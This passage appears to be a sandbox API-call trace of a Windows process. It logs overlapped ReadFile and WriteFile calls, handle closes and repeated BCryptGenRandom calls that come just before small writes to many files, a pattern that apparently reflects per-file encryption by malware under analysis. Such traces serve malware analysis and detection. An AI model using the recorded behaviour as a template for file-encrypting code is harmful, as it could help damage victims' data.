lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0096.281] ReadFile (in: hFile=0x1194, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xc2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0096.281] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0096.282] CloseHandle (hObject=0x13e0) returned 1 [0096.282] free (_Block=0x3ef0008) [0096.282] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0097.323] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xdcdf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0097.352] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0097.365] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x5caa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0097.366] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0097.518] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8edf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0097.540] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0097.546] CloseHandle (hObject=0x3b4) returned 1 [0097.546] free (_Block=0x3df0008) [0097.551] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0097.567] WriteFile (in: hFile=0x1194, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xca00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0097.567] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0097.601] CloseHandle (hObject=0x1194) returned 1 [0097.601] free (_Block=0x3d70048) [0097.602] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0097.610] WriteFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x13600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0097.611] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0097.636] WriteFile (in: hFile=0x3b4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0097.636] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0097.674] WriteFile (in: hFile=0x1194, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x4940, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0097.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0100.140] CloseHandle (hObject=0x3b0) returned 1 [0100.141] free (_Block=0x1ff1e60) [0100.141] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0100.153] ReadFile (in: hFile=0x1194, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x9a5b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0100.154] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0100.475] WriteFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.476] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0100.933] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.937] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0100.937] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.939] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0100.942] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.942] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.942] free (_Block=0x77d800) [0100.942] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.942] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.942] free (_Block=0x2071818) [0100.942] free (_Block=0x2071928) [0100.942] free (_Block=0x77d908) [0100.943] WriteFile (in: hFile=0x3b4, lpBuffer=0x3db00ec, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0100.943] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0100.963] ReadFile (in: hFile=0x3b0, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x1f6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0100.963] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.041] CloseHandle (hObject=0x3b0) returned 1 [0101.044] free (_Block=0x3df0128) [0101.050] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.121] WriteFile (in: hFile=0x13e0, lpBuffer=0x3e301cc*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30198 | out: lpBuffer=0x3e301cc*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30198) returned 1 [0101.121] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.193] CloseHandle (hObject=0x334) returned 1 [0101.197] free (_Block=0x3d70048) [0101.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.221] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.221] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.233] ReadFile (in: hFile=0xa50, lpBuffer=0x3e3003c, nNumberOfBytesToRead=0xc44, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008) returned 1 [0101.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.233] CloseHandle (hObject=0xa50) returned 1 [0101.241] free (_Block=0x3e30008) [0101.241] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.254] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.257] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0101.257] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.260] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.260] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0101.260] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.260] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.260] free (_Block=0x77d800) [0101.260] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.260] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.260] free (_Block=0x2071818) [0101.261] free (_Block=0x2071928) [0101.261] free (_Block=0x77d908) [0101.261] WriteFile (in: hFile=0x334, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0101.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.268] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0101.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.273] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0101.273] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.274] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.274] free (_Block=0x77d800) [0101.274] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.274] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.274] free (_Block=0x2071818) [0101.274] free (_Block=0x2071928) [0101.274] free (_Block=0x77d908) [0101.274] WriteFile (in: hFile=0xa50, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.274] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.282] WriteFile (in: hFile=0x334, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0101.283] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.318] WriteFile (in: hFile=0xa50, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0101.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.337] WriteFile (in: hFile=0x13e4, lpBuffer=0x3e3003c*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008) returned 1 [0101.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.361] ReadFile (in: hFile=0x334, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x296f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0101.375] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.382] ReadFile (in: hFile=0xa50, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x14c3, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.391] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.391] CloseHandle (hObject=0xa50) returned 1 [0101.396] free (_Block=0x1ff1e60) [0101.396] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.503] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.505] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0101.505] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.507] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0101.507] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.507] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.507] free (_Block=0x77d800) [0101.507] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.507] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.507] free (_Block=0x2071818) [0101.507] free (_Block=0x2071928) [0101.507] free (_Block=0x77d908) [0101.507] WriteFile (in: hFile=0x13e4, lpBuffer=0x3e3003c, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008) returned 0x0 [0101.508] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.518] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.519] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0101.519] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.521] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0101.521] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.521] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.521] free (_Block=0x77d800) [0101.521] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.521] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.521] free (_Block=0x2071818) [0101.521] free (_Block=0x2071928) [0101.521] free (_Block=0x77d908) [0101.521] WriteFile (in: hFile=0xcac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0101.522] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.532] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0101.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.535] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0101.535] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.535] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.535] free (_Block=0x77d800) [0101.535] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.535] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.535] free (_Block=0x2071818) [0101.535] free (_Block=0x2071928) [0101.535] free (_Block=0x77d908) [0101.535] WriteFile (in: hFile=0xcb0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.535] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.542] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.543] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0101.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.545] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0101.545] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.545] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.545] free (_Block=0x77d800) [0101.545] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.545] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.545] free (_Block=0x2071818) [0101.545] free (_Block=0x2071928) [0101.545] free (_Block=0x77d908) [0101.545] WriteFile (in: hFile=0xcb4, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0101.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.948] WriteFile (in: hFile=0xef8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0101.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.955] CloseHandle (hObject=0xefc) returned 1 [0101.956] free (_Block=0x3ef0008) [0101.956] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.966] CloseHandle (hObject=0xf00) returned 1 [0101.972] free (_Block=0x3db00b8) [0101.972] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0101.984] WriteFile (in: hFile=0xcac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, 